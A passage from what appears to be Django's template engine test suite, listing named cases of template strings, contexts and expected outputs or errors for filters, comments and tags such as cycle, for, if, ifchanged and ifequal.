'list-index07': ("{{ var.1 }}", {"var": {'1': "hello", 1: "world"}}, "hello"),
# Basic filter usage
'filter-syntax01': ("{{ var|upper }}", {"var": "Django is the greatest!"}, "DJANGO IS THE GREATEST!"),
# Chained filters
'filter-syntax02': ("{{ var|upper|lower }}", {"var": "Django is the greatest!"}, "django is the greatest!"),
# Allow spaces before the filter pipe
'filter-syntax03': ("{{ var |upper }}", {"var": "Django is the greatest!"}, "DJANGO IS THE GREATEST!"),
# Allow spaces after the filter pipe
'filter-syntax04': ("{{ var| upper }}", {"var": "Django is the greatest!"}, "DJANGO IS THE GREATEST!"),
# Raise TemplateSyntaxError for a nonexistent filter
'filter-syntax05': ("{{ var|does_not_exist }}", {}, template.TemplateSyntaxError),
# Raise TemplateSyntaxError when trying to access a filter containing an illegal character
'filter-syntax06': ("{{ var|fil(ter) }}", {}, template.TemplateSyntaxError),
# Raise TemplateSyntaxError for invalid block tags
'filter-syntax07': ("{% nothing_to_see_here %}", {}, template.TemplateSyntaxError),
# Raise TemplateSyntaxError for empty block tags
'filter-syntax08': ("{% %}", {}, template.TemplateSyntaxError),
# Chained filters, with an argument to the first one
'filter-syntax09': ('{{ var|removetags:"b i"|upper|lower }}', {"var": "<b><i>Yes</i></b>"}, "yes"),
# Literal string as argument is always "safe" from auto-escaping..
'filter-syntax10': (r'{{ var|default_if_none:" endquote\" hah" }}',
{"var": None}, ' endquote" hah'),
# Variable as argument
'filter-syntax11': (r'{{ var|default_if_none:var2 }}', {"var": None, "var2": "happy"}, 'happy'),
# Default argument testing
'filter-syntax12': (r'{{ var|yesno:"yup,nup,mup" }} {{ var|yesno }}', {"var": True}, 'yup yes'),
# Fail silently for methods that raise an exception with a
# "silent_variable_failure" attribute
'filter-syntax13': (r'1{{ var.method3 }}2', {"var": SomeClass()}, ("12", "1INVALID2")),
# In methods that raise an exception without a
# "silent_variable_attribute" set to True, the exception propagates
'filter-syntax14': (r'1{{ var.method4 }}2', {"var": SomeClass()}, (SomeOtherException, SomeOtherException)),
# Escaped backslash in argument
'filter-syntax15': (r'{{ var|default_if_none:"foo\bar" }}', {"var": None}, r'foo\bar'),
# Escaped backslash using known escape char
'filter-syntax16': (r'{{ var|default_if_none:"foo\now" }}', {"var": None}, r'foo\now'),
# Empty strings can be passed as arguments to filters
'filter-syntax17': (r'{{ var|join:"" }}', {'var': ['a', 'b', 'c']}, 'abc'),
# Make sure that any unicode strings are converted to bytestrings
# in the final output.
'filter-syntax18': (r'{{ var }}', {'var': UTF8Class()}, '\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111'),
# Numbers as filter arguments should work
'filter-syntax19': ('{{ var|truncatewords:1 }}', {"var": "hello world"}, "hello ..."),
#filters should accept empty string constants
'filter-syntax20': ('{{ ""|default_if_none:"was none" }}', {}, ""),
# Fail silently for non-callable attribute and dict lookups which
# raise an exception with a "silent_variable_failure" attribute
'filter-syntax21': (r'1{{ var.silent_fail_key }}2', {"var": SomeClass()}, ("12", "1INVALID2")),
'filter-syntax22': (r'1{{ var.silent_fail_attribute }}2', {"var": SomeClass()}, ("12", "1INVALID2")),
# In attribute and dict lookups that raise an unexpected exception
# without a "silent_variable_attribute" set to True, the exception
# propagates
'filter-syntax23': (r'1{{ var.noisy_fail_key }}2', {"var": SomeClass()}, (SomeOtherException, SomeOtherException)),
'filter-syntax24': (r'1{{ var.noisy_fail_attribute }}2', {"var": SomeClass()}, (SomeOtherException, SomeOtherException)),
### COMMENT SYNTAX ########################################################
'comment-syntax01': ("{# this is hidden #}hello", {}, "hello"),
'comment-syntax02': ("{# this is hidden #}hello{# foo #}", {}, "hello"),
# Comments can contain invalid stuff.
'comment-syntax03': ("foo{# {% if %} #}", {}, "foo"),
'comment-syntax04': ("foo{# {% endblock %} #}", {}, "foo"),
'comment-syntax05': ("foo{# {% somerandomtag %} #}", {}, "foo"),
'comment-syntax06': ("foo{# {% #}", {}, "foo"),
'comment-syntax07': ("foo{# %} #}", {}, "foo"),
'comment-syntax08': ("foo{# %} #}bar", {}, "foobar"),
'comment-syntax09': ("foo{# {{ #}", {}, "foo"),
'comment-syntax10': ("foo{# }} #}", {}, "foo"),
'comment-syntax11': ("foo{# { #}", {}, "foo"),
'comment-syntax12': ("foo{# } #}", {}, "foo"),
### COMMENT TAG ###########################################################
'comment-tag01': ("{% comment %}this is hidden{% endcomment %}hello", {}, "hello"),
'comment-tag02': ("{% comment %}this is hidden{% endcomment %}hello{% comment %}foo{% endcomment %}", {}, "hello"),
# Comment tag can contain invalid stuff.
'comment-tag03': ("foo{% comment %} {% if %} {% endcomment %}", {}, "foo"),
'comment-tag04': ("foo{% comment %} {% endblock %} {% endcomment %}", {}, "foo"),
'comment-tag05': ("foo{% comment %} {% somerandomtag %} {% endcomment %}", {}, "foo"),
### CYCLE TAG #############################################################
'cycle01': ('{% cycle a %}', {}, template.TemplateSyntaxError),
'cycle02': ('{% cycle a,b,c as abc %}{% cycle abc %}', {}, 'ab'),
'cycle03': ('{% cycle a,b,c as abc %}{% cycle abc %}{% cycle abc %}', {}, 'abc'),
'cycle04': ('{% cycle a,b,c as abc %}{% cycle abc %}{% cycle abc %}{% cycle abc %}', {}, 'abca'),
'cycle05': ('{% cycle %}', {}, template.TemplateSyntaxError),
'cycle06': ('{% cycle a %}', {}, template.TemplateSyntaxError),
'cycle07': ('{% cycle a,b,c as foo %}{% cycle bar %}', {}, template.TemplateSyntaxError),
'cycle08': ('{% cycle a,b,c as foo %}{% cycle foo %}{{ foo }}{{ foo }}{% cycle foo %}{{ foo }}', {}, 'abbbcc'),
'cycle09': ("{% for i in test %}{% cycle a,b %}{{ i }},{% endfor %}", {'test': range(5)}, 'a0,b1,a2,b3,a4,'),
'cycle10': ("{% cycle 'a' 'b' 'c' as abc %}{% cycle abc %}", {}, 'ab'),
'cycle11': ("{% cycle 'a' 'b' 'c' as abc %}{% cycle abc %}{% cycle abc %}", {}, 'abc'),
'cycle12': ("{% cycle 'a' 'b' 'c' as abc %}{% cycle abc %}{% cycle abc %}{% cycle abc %}", {}, 'abca'),
'cycle13': ("{% for i in test %}{% cycle 'a' 'b' %}{{ i }},{% endfor %}", {'test': range(5)}, 'a0,b1,a2,b3,a4,'),
'cycle14': ("{% cycle one two as foo %}{% cycle foo %}", {'one': '1','two': '2'}, '12'),
'cycle15': ("{% for i in test %}{% cycle aye bee %}{{ i }},{% endfor %}", {'test': range(5), 'aye': 'a', 'bee': 'b'}, 'a0,b1,a2,b3,a4,'),
'cycle16': ("{% cycle one|lower two as foo %}{% cycle foo %}", {'one': 'A','two': '2'}, 'a2'),
'cycle17': ("{% cycle 'a' 'b' 'c' as abc silent %}{% cycle abc %}{% cycle abc %}{% cycle abc %}{% cycle abc %}", {}, ""),
'cycle18': ("{% cycle 'a' 'b' 'c' as foo invalid_flag %}", {}, template.TemplateSyntaxError),
'cycle19': ("{% cycle 'a' 'b' as silent %}{% cycle silent %}", {}, "ab"),
'cycle20': ("{% cycle one two as foo %} & {% cycle foo %}", {'one' : 'A & B', 'two' : 'C & D'}, "A & B & C & D"),
'cycle21': ("{% filter force_escape %}{% cycle one two as foo %} & {% cycle foo %}{% endfilter %}", {'one' : 'A & B', 'two' : 'C & D'}, "A & B & C & D"),
'cycle22': ("{% for x in values %}{% cycle 'a' 'b' 'c' as abc silent %}{{ x }}{% endfor %}", {'values': [1,2,3,4]}, "1234"),
'cycle23': ("{% for x in values %}{% cycle 'a' 'b' 'c' as abc silent %}{{ abc }}{{ x }}{% endfor %}", {'values': [1,2,3,4]}, "a1b2c3a4"),
'included-cycle': ('{{ abc }}', {'abc': 'xxx'}, 'xxx'),
'cycle24': ("{% for x in values %}{% cycle 'a' 'b' 'c' as abc silent %}{% include 'included-cycle' %}{% endfor %}", {'values': [1,2,3,4]}, "abca"),
### EXCEPTIONS ############################################################
# Raise exception for invalid template name
'exception01': ("{% extends 'nonexistent' %}", {}, (template.TemplateDoesNotExist, template.TemplateDoesNotExist)),
# Raise exception for invalid template name (in variable)
'exception02': ("{% extends nonexistent %}", {}, (template.TemplateSyntaxError, template.TemplateDoesNotExist)),
# Raise exception for extra {% extends %} tags
'exception03': ("{% extends 'inheritance01' %}{% block first %}2{% endblock %}{% extends 'inheritance16' %}", {}, template.TemplateSyntaxError),
# Raise exception for custom tags used in child with {% load %} tag in parent, not in child
'exception04': ("{% extends 'inheritance17' %}{% block first %}{% echo 400 %}5678{% endblock %}", {}, template.TemplateSyntaxError),
### FILTER TAG ############################################################
'filter01': ('{% filter upper %}{% endfilter %}', {}, ''),
'filter02': ('{% filter upper %}django{% endfilter %}', {}, 'DJANGO'),
'filter03': ('{% filter upper|lower %}django{% endfilter %}', {}, 'django'),
'filter04': ('{% filter cut:remove %}djangospam{% endfilter %}', {'remove': 'spam'}, 'django'),
### FIRSTOF TAG ###########################################################
'firstof01': ('{% firstof a b c %}', {'a':0,'b':0,'c':0}, ''),
'firstof02': ('{% firstof a b c %}', {'a':1,'b':0,'c':0}, '1'),
'firstof03': ('{% firstof a b c %}', {'a':0,'b':2,'c':0}, '2'),
'firstof04': ('{% firstof a b c %}', {'a':0,'b':0,'c':3}, '3'),
'firstof05': ('{% firstof a b c %}', {'a':1,'b':2,'c':3}, '1'),
'firstof06': ('{% firstof a b c %}', {'b':0,'c':3}, '3'),
'firstof07': ('{% firstof a b "c" %}', {'a':0}, 'c'),
'firstof08': ('{% firstof a b "c and d" %}', {'a':0,'b':0}, 'c and d'),
'firstof09': ('{% firstof %}', {}, template.TemplateSyntaxError),
'firstof10': ('{% firstof a %}', {'a': '<'}, '<'), # Variables are NOT auto-escaped.
### FOR TAG ###############################################################
'for-tag01': ("{% for val in values %}{{ val }}{% endfor %}", {"values": [1, 2, 3]}, "123"),
'for-tag02': ("{% for val in values reversed %}{{ val }}{% endfor %}", {"values": [1, 2, 3]}, "321"),
'for-tag-vars01': ("{% for val in values %}{{ forloop.counter }}{% endfor %}", {"values": [6, 6, 6]}, "123"),
'for-tag-vars02': ("{% for val in values %}{{ forloop.counter0 }}{% endfor %}", {"values": [6, 6, 6]}, "012"),
'for-tag-vars03': ("{% for val in values %}{{ forloop.revcounter }}{% endfor %}", {"values": [6, 6, 6]}, "321"),
'for-tag-vars04': ("{% for val in values %}{{ forloop.revcounter0 }}{% endfor %}", {"values": [6, 6, 6]}, "210"),
'for-tag-vars05': ("{% for val in values %}{% if forloop.first %}f{% else %}x{% endif %}{% endfor %}", {"values": [6, 6, 6]}, "fxx"),
'for-tag-vars06': ("{% for val in values %}{% if forloop.last %}l{% else %}x{% endif %}{% endfor %}", {"values": [6, 6, 6]}, "xxl"),
'for-tag-unpack01': ("{% for key,value in items %}{{ key }}:{{ value }}/{% endfor %}", {"items": (('one', 1), ('two', 2))}, "one:1/two:2/"),
'for-tag-unpack03': ("{% for key, value in items %}{{ key }}:{{ value }}/{% endfor %}", {"items": (('one', 1), ('two', 2))}, "one:1/two:2/"),
'for-tag-unpack04': ("{% for key , value in items %}{{ key }}:{{ value }}/{% endfor %}", {"items": (('one', 1), ('two', 2))}, "one:1/two:2/"),
'for-tag-unpack05': ("{% for key ,value in items %}{{ key }}:{{ value }}/{% endfor %}", {"items": (('one', 1), ('two', 2))}, "one:1/two:2/"),
'for-tag-unpack06': ("{% for key value in items %}{{ key }}:{{ value }}/{% endfor %}", {"items": (('one', 1), ('two', 2))}, template.TemplateSyntaxError),
'for-tag-unpack07': ("{% for key,,value in items %}{{ key }}:{{ value }}/{% endfor %}", {"items": (('one', 1), ('two', 2))}, template.TemplateSyntaxError),
'for-tag-unpack08': ("{% for key,value, in items %}{{ key }}:{{ value }}/{% endfor %}", {"items": (('one', 1), ('two', 2))}, template.TemplateSyntaxError),
# Ensure that a single loopvar doesn't truncate the list in val.
'for-tag-unpack09': ("{% for val in items %}{{ val.0 }}:{{ val.1 }}/{% endfor %}", {"items": (('one', 1), ('two', 2))}, "one:1/two:2/"),
# Otherwise, silently truncate if the length of loopvars differs to the length of each set of items.
'for-tag-unpack10': ("{% for x,y in items %}{{ x }}:{{ y }}/{% endfor %}", {"items": (('one', 1, 'carrot'), ('two', 2, 'orange'))}, "one:1/two:2/"),
'for-tag-unpack11': ("{% for x,y,z in items %}{{ x }}:{{ y }},{{ z }}/{% endfor %}", {"items": (('one', 1), ('two', 2))}, ("one:1,/two:2,/", "one:1,INVALID/two:2,INVALID/")),
'for-tag-unpack12': ("{% for x,y,z in items %}{{ x }}:{{ y }},{{ z }}/{% endfor %}", {"items": (('one', 1, 'carrot'), ('two', 2))}, ("one:1,carrot/two:2,/", "one:1,carrot/two:2,INVALID/")),
'for-tag-unpack13': ("{% for x,y,z in items %}{{ x }}:{{ y }},{{ z }}/{% endfor %}", {"items": (('one', 1, 'carrot'), ('two', 2, 'cheese'))}, ("one:1,carrot/two:2,cheese/", "one:1,carrot/two:2,cheese/")),
'for-tag-unpack14': ("{% for x,y in items %}{{ x }}:{{ y }}/{% endfor %}", {"items": (1, 2)}, (":/:/", "INVALID:INVALID/INVALID:INVALID/")),
'for-tag-empty01': ("{% for val in values %}{{ val }}{% empty %}empty text{% endfor %}", {"values": [1, 2, 3]}, "123"),
'for-tag-empty02': ("{% for val in values %}{{ val }}{% empty %}values array empty{% endfor %}", {"values": []}, "values array empty"),
'for-tag-empty03': ("{% for val in values %}{{ val }}{% empty %}values array not found{% endfor %}", {}, "values array not found"),
### IF TAG ################################################################
'if-tag01': ("{% if foo %}yes{% else %}no{% endif %}", {"foo": True}, "yes"),
'if-tag02': ("{% if foo %}yes{% else %}no{% endif %}", {"foo": False}, "no"),
'if-tag03': ("{% if foo %}yes{% else %}no{% endif %}", {}, "no"),
'if-tag04': ("{% if foo %}foo{% elif bar %}bar{% endif %}", {'foo': True}, "foo"),
'if-tag05': ("{% if foo %}foo{% elif bar %}bar{% endif %}", {'bar': True}, "bar"),
'if-tag06': ("{% if foo %}foo{% elif bar %}bar{% endif %}", {}, ""),
'if-tag07': ("{% if foo %}foo{% elif bar %}bar{% else %}nothing{% endif %}", {'foo': True}, "foo"),
'if-tag08': ("{% if foo %}foo{% elif bar %}bar{% else %}nothing{% endif %}", {'bar': True}, "bar"),
'if-tag09': ("{% if foo %}foo{% elif bar %}bar{% else %}nothing{% endif %}", {}, "nothing"),
'if-tag10': ("{% if foo %}foo{% elif bar %}bar{% elif baz %}baz{% else %}nothing{% endif %}", {'foo': True}, "foo"),
'if-tag11': ("{% if foo %}foo{% elif bar %}bar{% elif baz %}baz{% else %}nothing{% endif %}", {'bar': True}, "bar"),
'if-tag12': ("{% if foo %}foo{% elif bar %}bar{% elif baz %}baz{% else %}nothing{% endif %}", {'baz': True}, "baz"),
'if-tag13': ("{% if foo %}foo{% elif bar %}bar{% elif baz %}baz{% else %}nothing{% endif %}", {}, "nothing"),
# Filters
'if-tag-filter01': ("{% if foo|length == 5 %}yes{% else %}no{% endif %}", {'foo': 'abcde'}, "yes"),
'if-tag-filter02': ("{% if foo|upper == 'ABC' %}yes{% else %}no{% endif %}", {}, "no"),
# Equality
'if-tag-eq01': ("{% if foo == bar %}yes{% else %}no{% endif %}", {}, "yes"),
'if-tag-eq02': ("{% if foo == bar %}yes{% else %}no{% endif %}", {'foo': 1}, "no"),
'if-tag-eq03': ("{% if foo == bar %}yes{% else %}no{% endif %}", {'foo': 1, 'bar': 1}, "yes"),
'if-tag-eq04': ("{% if foo == bar %}yes{% else %}no{% endif %}", {'foo': 1, 'bar': 2}, "no"),
'if-tag-eq05': ("{% if foo == '' %}yes{% else %}no{% endif %}", {}, "no"),
# Comparison
'if-tag-gt-01': ("{% if 2 > 1 %}yes{% else %}no{% endif %}", {}, "yes"),
'if-tag-gt-02': ("{% if 1 > 1 %}yes{% else %}no{% endif %}", {}, "no"),
'if-tag-gte-01': ("{% if 1 >= 1 %}yes{% else %}no{% endif %}", {}, "yes"),
'if-tag-gte-02': ("{% if 1 >= 2 %}yes{% else %}no{% endif %}", {}, "no"),
'if-tag-lt-01': ("{% if 1 < 2 %}yes{% else %}no{% endif %}", {}, "yes"),
'if-tag-lt-02': ("{% if 1 < 1 %}yes{% else %}no{% endif %}", {}, "no"),
'if-tag-lte-01': ("{% if 1 <= 1 %}yes{% else %}no{% endif %}", {}, "yes"),
'if-tag-lte-02': ("{% if 2 <= 1 %}yes{% else %}no{% endif %}", {}, "no"),
# Contains
'if-tag-in-01': ("{% if 1 in x %}yes{% else %}no{% endif %}", {'x':[1]}, "yes"),
'if-tag-in-02': ("{% if 2 in x %}yes{% else %}no{% endif %}", {'x':[1]}, "no"),
'if-tag-not-in-01': ("{% if 1 not in x %}yes{% else %}no{% endif %}", {'x':[1]}, "no"),
'if-tag-not-in-02': ("{% if 2 not in x %}yes{% else %}no{% endif %}", {'x':[1]}, "yes"),
# AND
'if-tag-and01': ("{% if foo and bar %}yes{% else %}no{% endif %}", {'foo': True, 'bar': True}, 'yes'),
'if-tag-and02': ("{% if foo and bar %}yes{% else %}no{% endif %}", {'foo': True, 'bar': False}, 'no'),
'if-tag-and03': ("{% if foo and bar %}yes{% else %}no{% endif %}", {'foo': False, 'bar': True}, 'no'),
'if-tag-and04': ("{% if foo and bar %}yes{% else %}no{% endif %}", {'foo': False, 'bar': False}, 'no'),
'if-tag-and05': ("{% if foo and bar %}yes{% else %}no{% endif %}", {'foo': False}, 'no'),
'if-tag-and06': ("{% if foo and bar %}yes{% else %}no{% endif %}", {'bar': False}, 'no'),
'if-tag-and07': ("{% if foo and bar %}yes{% else %}no{% endif %}", {'foo': True}, 'no'),
'if-tag-and08': ("{% if foo and bar %}yes{% else %}no{% endif %}", {'bar': True}, 'no'),
# OR
'if-tag-or01': ("{% if foo or bar %}yes{% else %}no{% endif %}", {'foo': True, 'bar': True}, 'yes'),
'if-tag-or02': ("{% if foo or bar %}yes{% else %}no{% endif %}", {'foo': True, 'bar': False}, 'yes'),
'if-tag-or03': ("{% if foo or bar %}yes{% else %}no{% endif %}", {'foo': False, 'bar': True}, 'yes'),
'if-tag-or04': ("{% if foo or bar %}yes{% else %}no{% endif %}", {'foo': False, 'bar': False}, 'no'),
'if-tag-or05': ("{% if foo or bar %}yes{% else %}no{% endif %}", {'foo': False}, 'no'),
'if-tag-or06': ("{% if foo or bar %}yes{% else %}no{% endif %}", {'bar': False}, 'no'),
'if-tag-or07': ("{% if foo or bar %}yes{% else %}no{% endif %}", {'foo': True}, 'yes'),
'if-tag-or08': ("{% if foo or bar %}yes{% else %}no{% endif %}", {'bar': True}, 'yes'),
# multiple ORs
'if-tag-or09': ("{% if foo or bar or baz %}yes{% else %}no{% endif %}", {'baz': True}, 'yes'),
# NOT
'if-tag-not01': ("{% if not foo %}no{% else %}yes{% endif %}", {'foo': True}, 'yes'),
'if-tag-not02': ("{% if not not foo %}no{% else %}yes{% endif %}", {'foo': True}, 'no'),
# not03 to not05 removed, now TemplateSyntaxErrors
'if-tag-not06': ("{% if foo and not bar %}yes{% else %}no{% endif %}", {}, 'no'),
'if-tag-not07': ("{% if foo and not bar %}yes{% else %}no{% endif %}", {'foo': True, 'bar': True}, 'no'),
'if-tag-not08': ("{% if foo and not bar %}yes{% else %}no{% endif %}", {'foo': True, 'bar': False}, 'yes'),
'if-tag-not09': ("{% if foo and not bar %}yes{% else %}no{% endif %}", {'foo': False, 'bar': True}, 'no'),
'if-tag-not10': ("{% if foo and not bar %}yes{% else %}no{% endif %}", {'foo': False, 'bar': False}, 'no'),
'if-tag-not11': ("{% if not foo and bar %}yes{% else %}no{% endif %}", {}, 'no'),
'if-tag-not12': ("{% if not foo and bar %}yes{% else %}no{% endif %}", {'foo': True, 'bar': True}, 'no'),
'if-tag-not13': ("{% if not foo and bar %}yes{% else %}no{% endif %}", {'foo': True, 'bar': False}, 'no'),
'if-tag-not14': ("{% if not foo and bar %}yes{% else %}no{% endif %}", {'foo': False, 'bar': True}, 'yes'),
'if-tag-not15': ("{% if not foo and bar %}yes{% else %}no{% endif %}", {'foo': False, 'bar': False}, 'no'),
'if-tag-not16': ("{% if foo or not bar %}yes{% else %}no{% endif %}", {}, 'yes'),
'if-tag-not17': ("{% if foo or not bar %}yes{% else %}no{% endif %}", {'foo': True, 'bar': True}, 'yes'),
'if-tag-not18': ("{% if foo or not bar %}yes{% else %}no{% endif %}", {'foo': True, 'bar': False}, 'yes'),
'if-tag-not19': ("{% if foo or not bar %}yes{% else %}no{% endif %}", {'foo': False, 'bar': True}, 'no'),
'if-tag-not20': ("{% if foo or not bar %}yes{% else %}no{% endif %}", {'foo': False, 'bar': False}, 'yes'),
'if-tag-not21': ("{% if not foo or bar %}yes{% else %}no{% endif %}", {}, 'yes'),
'if-tag-not22': ("{% if not foo or bar %}yes{% else %}no{% endif %}", {'foo': True, 'bar': True}, 'yes'),
'if-tag-not23': ("{% if not foo or bar %}yes{% else %}no{% endif %}", {'foo': True, 'bar': False}, 'no'),
'if-tag-not24': ("{% if not foo or bar %}yes{% else %}no{% endif %}", {'foo': False, 'bar': True}, 'yes'),
'if-tag-not25': ("{% if not foo or bar %}yes{% else %}no{% endif %}", {'foo': False, 'bar': False}, 'yes'),
'if-tag-not26': ("{% if not foo and not bar %}yes{% else %}no{% endif %}", {}, 'yes'),
'if-tag-not27': ("{% if not foo and not bar %}yes{% else %}no{% endif %}", {'foo': True, 'bar': True}, 'no'),
'if-tag-not28': ("{% if not foo and not bar %}yes{% else %}no{% endif %}", {'foo': True, 'bar': False}, 'no'),
'if-tag-not29': ("{% if not foo and not bar %}yes{% else %}no{% endif %}", {'foo': False, 'bar': True}, 'no'),
'if-tag-not30': ("{% if not foo and not bar %}yes{% else %}no{% endif %}", {'foo': False, 'bar': False}, 'yes'),
'if-tag-not31': ("{% if not foo or not bar %}yes{% else %}no{% endif %}", {}, 'yes'),
'if-tag-not32': ("{% if not foo or not bar %}yes{% else %}no{% endif %}", {'foo': True, 'bar': True}, 'no'),
'if-tag-not33': ("{% if not foo or not bar %}yes{% else %}no{% endif %}", {'foo': True, 'bar': False}, 'yes'),
'if-tag-not34': ("{% if not foo or not bar %}yes{% else %}no{% endif %}", {'foo': False, 'bar': True}, 'yes'),
'if-tag-not35': ("{% if not foo or not bar %}yes{% else %}no{% endif %}", {'foo': False, 'bar': False}, 'yes'),
# Various syntax errors
'if-tag-error01': ("{% if %}yes{% endif %}", {}, template.TemplateSyntaxError),
'if-tag-error02': ("{% if foo and %}yes{% else %}no{% endif %}", {'foo': True}, template.TemplateSyntaxError),
'if-tag-error03': ("{% if foo or %}yes{% else %}no{% endif %}", {'foo': True}, template.TemplateSyntaxError),
'if-tag-error04': ("{% if not foo and %}yes{% else %}no{% endif %}", {'foo': True}, template.TemplateSyntaxError),
'if-tag-error05': ("{% if not foo or %}yes{% else %}no{% endif %}", {'foo': True}, template.TemplateSyntaxError),
'if-tag-error06': ("{% if abc def %}yes{% endif %}", {}, template.TemplateSyntaxError),
'if-tag-error07': ("{% if not %}yes{% endif %}", {}, template.TemplateSyntaxError),
'if-tag-error08': ("{% if and %}yes{% endif %}", {}, template.TemplateSyntaxError),
'if-tag-error09': ("{% if or %}yes{% endif %}", {}, template.TemplateSyntaxError),
'if-tag-error10': ("{% if == %}yes{% endif %}", {}, template.TemplateSyntaxError),
'if-tag-error11': ("{% if 1 == %}yes{% endif %}", {}, template.TemplateSyntaxError),
'if-tag-error12': ("{% if a not b %}yes{% endif %}", {}, template.TemplateSyntaxError),
# If evaluations are shortcircuited where possible
# If is_bad is invoked, it will raise a ShouldNotExecuteException
'if-tag-shortcircuit01': ('{% if x.is_true or x.is_bad %}yes{% else %}no{% endif %}', {'x': TestObj()}, "yes"),
'if-tag-shortcircuit02': ('{% if x.is_false and x.is_bad %}yes{% else %}no{% endif %}', {'x': TestObj()}, "no"),
# Non-existent args
'if-tag-badarg01':("{% if x|default_if_none:y %}yes{% endif %}", {}, ''),
'if-tag-badarg02':("{% if x|default_if_none:y %}yes{% endif %}", {'y': 0}, ''),
'if-tag-badarg03':("{% if x|default_if_none:y %}yes{% endif %}", {'y': 1}, 'yes'),
'if-tag-badarg04':("{% if x|default_if_none:y %}yes{% else %}no{% endif %}", {}, 'no'),
# Additional, more precise parsing tests are in SmartIfTests
### IFCHANGED TAG #########################################################
'ifchanged01': ('{% for n in num %}{% ifchanged %}{{ n }}{% endifchanged %}{% endfor %}', {'num': (1,2,3)}, '123'),
'ifchanged02': ('{% for n in num %}{% ifchanged %}{{ n }}{% endifchanged %}{% endfor %}', {'num': (1,1,3)}, '13'),
'ifchanged03': ('{% for n in num %}{% ifchanged %}{{ n }}{% endifchanged %}{% endfor %}', {'num': (1,1,1)}, '1'),
'ifchanged04': ('{% for n in num %}{% ifchanged %}{{ n }}{% endifchanged %}{% for x in numx %}{% ifchanged %}{{ x }}{% endifchanged %}{% endfor %}{% endfor %}', {'num': (1, 2, 3), 'numx': (2, 2, 2)}, '122232'),
'ifchanged05': ('{% for n in num %}{% ifchanged %}{{ n }}{% endifchanged %}{% for x in numx %}{% ifchanged %}{{ x }}{% endifchanged %}{% endfor %}{% endfor %}', {'num': (1, 1, 1), 'numx': (1, 2, 3)}, '1123123123'),
'ifchanged06': ('{% for n in num %}{% ifchanged %}{{ n }}{% endifchanged %}{% for x in numx %}{% ifchanged %}{{ x }}{% endifchanged %}{% endfor %}{% endfor %}', {'num': (1, 1, 1), 'numx': (2, 2, 2)}, '1222'),
'ifchanged07': ('{% for n in num %}{% ifchanged %}{{ n }}{% endifchanged %}{% for x in numx %}{% ifchanged %}{{ x }}{% endifchanged %}{% for y in numy %}{% ifchanged %}{{ y }}{% endifchanged %}{% endfor %}{% endfor %}{% endfor %}', {'num': (1, 1, 1), 'numx': (2, 2, 2), 'numy': (3, 3, 3)}, '1233323332333'),
'ifchanged08': ('{% for data in datalist %}{% for c,d in data %}{% if c %}{% ifchanged %}{{ d }}{% endifchanged %}{% endif %}{% endfor %}{% endfor %}', {'datalist': [[(1, 'a'), (1, 'a'), (0, 'b'), (1, 'c')], [(0, 'a'), (1, 'c'), (1, 'd'), (1, 'd'), (0, 'e')]]}, 'accd'),
# Test one parameter given to ifchanged.
'ifchanged-param01': ('{% for n in num %}{% ifchanged n %}..{% endifchanged %}{{ n }}{% endfor %}', { 'num': (1,2,3) }, '..1..2..3'),
'ifchanged-param02': ('{% for n in num %}{% for x in numx %}{% ifchanged n %}..{% endifchanged %}{{ x }}{% endfor %}{% endfor %}', { 'num': (1,2,3), 'numx': (5,6,7) }, '..567..567..567'),
# Test multiple parameters to ifchanged.
'ifchanged-param03': ('{% for n in num %}{{ n }}{% for x in numx %}{% ifchanged x n %}{{ x }}{% endifchanged %}{% endfor %}{% endfor %}', { 'num': (1,1,2), 'numx': (5,6,6) }, '156156256'),
# Test a date+hour like construct, where the hour of the last day
# is the same but the date had changed, so print the hour anyway.
'ifchanged-param04': ('{% for d in days %}{% ifchanged %}{{ d.day }}{% endifchanged %}{% for h in d.hours %}{% ifchanged d h %}{{ h }}{% endifchanged %}{% endfor %}{% endfor %}', {'days':[{'day':1, 'hours':[1,2,3]},{'day':2, 'hours':[3]},] }, '112323'),
# Logically the same as above, just written with explicit
# ifchanged for the day.
'ifchanged-param05': ('{% for d in days %}{% ifchanged d.day %}{{ d.day }}{% endifchanged %}{% for h in d.hours %}{% ifchanged d.day h %}{{ h }}{% endifchanged %}{% endfor %}{% endfor %}', {'days':[{'day':1, 'hours':[1,2,3]},{'day':2, 'hours':[3]},] }, '112323'),
# Test the else clause of ifchanged.
'ifchanged-else01': ('{% for id in ids %}{{ id }}{% ifchanged id %}-first{% else %}-other{% endifchanged %},{% endfor %}', {'ids': [1,1,2,2,2,3]}, '1-first,1-other,2-first,2-other,2-other,3-first,'),
'ifchanged-else02': ('{% for id in ids %}{{ id }}-{% ifchanged id %}{% cycle red,blue %}{% else %}grey{% endifchanged %},{% endfor %}', {'ids': [1,1,2,2,2,3]}, '1-red,1-grey,2-blue,2-grey,2-grey,3-red,'),
'ifchanged-else03': ('{% for id in ids %}{{ id }}{% ifchanged id %}-{% cycle red,blue %}{% else %}{% endifchanged %},{% endfor %}', {'ids': [1,1,2,2,2,3]}, '1-red,1,2-blue,2,2,3-red,'),
'ifchanged-else04': ('{% for id in ids %}{% ifchanged %}***{{ id }}*{% else %}...{% endifchanged %}{{ forloop.counter }}{% endfor %}', {'ids': [1,1,2,2,2,3,4]}, '***1*1...2***2*3...4...5***3*6***4*7'),
### IFEQUAL TAG ###########################################################
'ifequal01': ("{% ifequal a b %}yes{% endifequal %}", {"a": 1, "b": 2}, ""),
'ifequal02': ("{% ifequal a b %}yes{% endifequal %}", {"a": 1, "b": 1}, "yes"),
'ifequal03': ("{% ifequal a b %}yes{% else %}no{% endifequal %}", {"a": 1, "b": 2}, "no"),
'ifequal04': ("{% ifequal a b %}yes{% else %}no{% endifequal %}", {"a": 1, "b": 1}, "yes"),
'ifequal05': ("{% ifequal a 'test' %}yes{% else %}no{% endifequal %}", {"a": "test"}, "yes"),
'ifequal06': ("{% ifequal a 'test' %}yes{% else %}no{% endifequal %}", {"a": "no"}, "no"),
'ifequal07': ('{% ifequal a "test" %}yes{% else %}no{% endifequal %}', {"a": "test"}, "yes"),
'ifequal08': ('{% ifequal a "test" %}yes{% else %}no{% endifequal %}', {"a": "no"}, "no"),
'ifequal09': ('{% ifequal a "test" %}yes{% else %}no{% endifequal %}', {}, "no"),
'ifequal10': ('{% ifequal a b %}yes{% else %}no{% endifequal %}', {}, "yes"),
# SMART SPLITTING
'ifequal-split01': ('{% ifequal a "test man" %}yes{% else %}no{% endifequal %}', {}, "no"),
'ifequal-split02': ('{% ifequal a "test man" %}yes{% else %}no{% endifequal %}', {'a': 'foo'}, "no"),
